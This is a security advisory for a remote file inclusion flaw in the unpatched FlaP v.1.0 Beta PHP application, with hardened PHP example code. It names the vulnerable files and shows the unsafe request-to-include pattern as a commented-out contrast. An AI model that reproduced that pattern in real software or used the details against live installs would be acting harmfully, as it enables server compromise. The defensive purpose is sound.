FlaP v.1.0. Beta
vendor:
by:
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: FlaP v.1.0. Beta
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
FlaP v.1.0. Beta - Remote File Inclusion Vulnerability
The FlaP v.1.0. Beta application is vulnerable to remote file inclusion, allowing an attacker to include and execute arbitrary files on the server. The vulnerability is triggered by supplying an attacker-controlled file path in a request parameter handled by the affected PHP files (skin/html/table.php and login.php). The vulnerable code in these files passes the supplied value to the 'include' function without any sanitization or validation.
Mitigation:
To mitigate this vulnerability, implement proper input validation and sanitization. The application should validate user-supplied file paths against a fixed set of permitted files and ensure that any resolved path stays within the intended directory. Additionally, the 'include' function should be used with caution: it should only ever load trusted, application-defined files, never a value taken directly from a request.
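As an added illustration of the mitigation above (this is example code, not FlaP's own source), the block below shows the generic unsafe pattern the advisory describes, commented out for contrast, next to a hardened page loader. The `page` request parameter, the `PAGES` allowlist and the `pages/` directory are assumptions chosen for the example; the file names in the allowlist are only placeholders and do not describe FlaP's layout.

```php
<?php
// Added example, not code from FlaP. Demonstrates replacing a user-controlled
// include with an allowlist plus a directory-containment check.
//
// Unsafe pattern the advisory describes (constructed, shown for contrast):
//   include $_GET['page'];
// Any value reaching include() this way can name a local file, and with
// allow_url_include enabled it can name a remote one. Never pass request
// input to include/require directly.

declare(strict_types=1);

// Assumed location of the application's includable page fragments.
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: request value -> file on disk. Only these keys are accepted,
// so no user-supplied text is ever concatenated into the include path.
// (Placeholder names; not FlaP's real files.)
const PAGES = [
    'home'  => 'home.php',
    'login' => 'login.php',
    'table' => 'table.php',
];

/**
 * Resolve a requested page name to an absolute file path, or return null.
 *
 * Step 1: exact key match against the allowlist.
 * Step 2: defence in depth; realpath() both the base directory and the
 *         target and confirm the target sits inside the base directory,
 *         so a misconfigured allowlist entry cannot escape it either.
 */
function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null; // not an allowlisted page name
    }

    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // base directory or target file does not exist
    }

    // Containment check: $path must start with "$base/" (or "$base\" on Windows).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $path;
}

// Hardened replacement for the unsafe include shown at the top.
$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';
$file = resolvePage($requested);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

The allowlist alone already removes the remote file inclusion, because the request value is used only as an array key and never becomes part of a path; the realpath containment check is a second layer that also protects against mistakes in the allowlist itself. As a server-side hardening measure that does not depend on the application code, keeping `allow_url_include=Off` in php.ini prevents include/require from loading URLs at all.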